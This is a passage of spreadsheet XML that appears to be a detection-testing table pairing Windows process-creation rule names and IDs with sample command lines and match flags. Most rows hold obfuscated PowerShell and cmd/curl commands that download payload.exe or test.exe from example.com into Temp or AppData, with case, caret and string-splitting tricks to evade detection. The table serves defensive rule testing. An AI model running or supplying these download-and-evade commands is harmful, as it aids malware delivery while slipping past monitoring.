      <c r="J3050" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3050" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3051" ht="15.75" customHeight="1" s="42">
      <c r="A3051" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3051" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3051" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3051" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3051" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3051" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3051" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3051" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3051" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3051" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3051" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3052" ht="15.75" customHeight="1" s="42">
      <c r="A3052" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3052" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3052" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3052" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3052" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnD "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3052" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3052" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3052" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3052" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3052" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3052" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3053" ht="15.75" customHeight="1" s="42">
      <c r="A3053" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3053" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3053" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3053" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3053" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3053" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3053" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3053" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3053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53" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3053" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3054" ht="15.75" customHeight="1" s="42">
      <c r="A3054" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3054" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3054" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3054" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3054" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3054" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3054" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3054" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3054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54" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3054" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3055" ht="15.75" customHeight="1" s="42">
      <c r="A3055" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3055" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3055" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3055" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3055" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3055" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3055" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3055" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I305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55" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3055" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3056" ht="15.75" customHeight="1" s="42">
      <c r="A3056" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3056" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3056" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3056" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3056" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3056" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3056" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3056" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3056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56" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3056" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3057" ht="15.75" customHeight="1" s="42">
      <c r="A3057" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3057" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3057" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3057" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3057" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3057" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3057" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3057" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3057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057" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3057" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3058" ht="15.75" customHeight="1" s="42">
      <c r="A3058" s="43" t="n"/>
      <c r="B3058" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3058" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3058" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3058" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F3058" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3058" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3058" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3058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058" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3058" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3059" ht="15.75" customHeight="1" s="42">
      <c r="A3059" s="43" t="n"/>
      <c r="B3059" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3059" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3059" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3059" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F3059" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3059" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3059" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3059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59" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3059" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3060" ht="15.75" customHeight="1" s="42">
      <c r="A3060" s="43" t="n"/>
      <c r="B3060" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3060" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3060" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3060" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F3060" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3060" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3060" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3060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60" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3060" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3061" ht="15.75" customHeight="1" s="42">
      <c r="A3061" s="43" t="n"/>
      <c r="B3061" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3061" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3061" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3061" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F3061" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3061" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3061" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3061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61" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3061" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3062" ht="15.75" customHeight="1" s="42">
      <c r="A3062" s="43" t="n"/>
      <c r="B3062" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3062" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3062" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3062" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -O %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F3062" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3062" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3062" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3062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62" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3062" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3063" ht="15.75" customHeight="1" s="42">
      <c r="A3063" s="43" t="n"/>
      <c r="B3063" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3063" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3063" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3063" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F3063" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3063" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3063" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3063" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3063" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3063" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3064" ht="15.75" customHeight="1" s="42">
      <c r="A3064" s="43" t="n"/>
      <c r="B3064" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3064" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3064" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3064" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F3064" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3064" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3064" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3064" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3064" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3064" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3065" ht="15.75" customHeight="1" s="42">
      <c r="A3065" s="43" t="n"/>
      <c r="B3065" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3065" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3065" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3065" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl /"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F3065" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3065" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3065" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3065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65" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3065" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3066" ht="15.75" customHeight="1" s="42">
      <c r="A3066" s="43" t="n"/>
      <c r="B3066" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3066" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3066" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3066" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F3066" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3066" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3066" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3066" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3066" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3066" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3067" ht="15.75" customHeight="1" s="42">
      <c r="A3067" s="43" t="n"/>
      <c r="B3067" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3067" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3067" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3067" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F3067" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3067" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3067" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3067" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3067" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3067" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3068" ht="15.75" customHeight="1" s="42">
      <c r="A3068" s="43" t="n"/>
      <c r="B3068" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3068" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3068" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3068" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F3068" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3068" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3068" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3068" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3068" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3068" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3069" ht="15.75" customHeight="1" s="42">
      <c r="A3069" s="43" t="n"/>
      <c r="B3069" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3069" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3069" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3069" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMAnD "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F3069" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3069" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3069" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3069" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3069" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3069" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3070" ht="15.75" customHeight="1" s="42">
      <c r="A3070" s="43" t="n"/>
      <c r="B3070" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3070" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3070" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3070" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F3070" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3070" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3070" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3070" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3070" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3070" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3071" ht="15.75" customHeight="1" s="42">
      <c r="A3071" s="43" t="n"/>
      <c r="B3071" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3071" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3071" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3071" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F3071" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3071" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3071" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3071" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3071" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3071" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3072" ht="15.75" customHeight="1" s="42">
      <c r="A3072" s="43" t="n"/>
      <c r="B3072" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3072" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3072" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3072" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F3072" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3072" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3072" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3072" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3072" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3072" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3073" ht="15.75" customHeight="1" s="42">
      <c r="A3073" s="43" t="n"/>
      <c r="B3073" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3073" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3073" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3073" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F3073" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3073" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3073" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3073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3073" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3073" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3074" ht="15.75" customHeight="1" s="42">
      <c r="A3074" s="43" t="n"/>
      <c r="B3074" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3074" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3074" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3074" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F3074" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3074" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3074" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3074" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3074" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3074" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3075" ht="15.75" customHeight="1" s="42">
      <c r="A3075" s="43" t="n"/>
      <c r="B3075" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C3075" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D3075" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E3075" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F3075" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3075" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3075" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3075" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3075" s="44" t="n">
        <v>0</v>
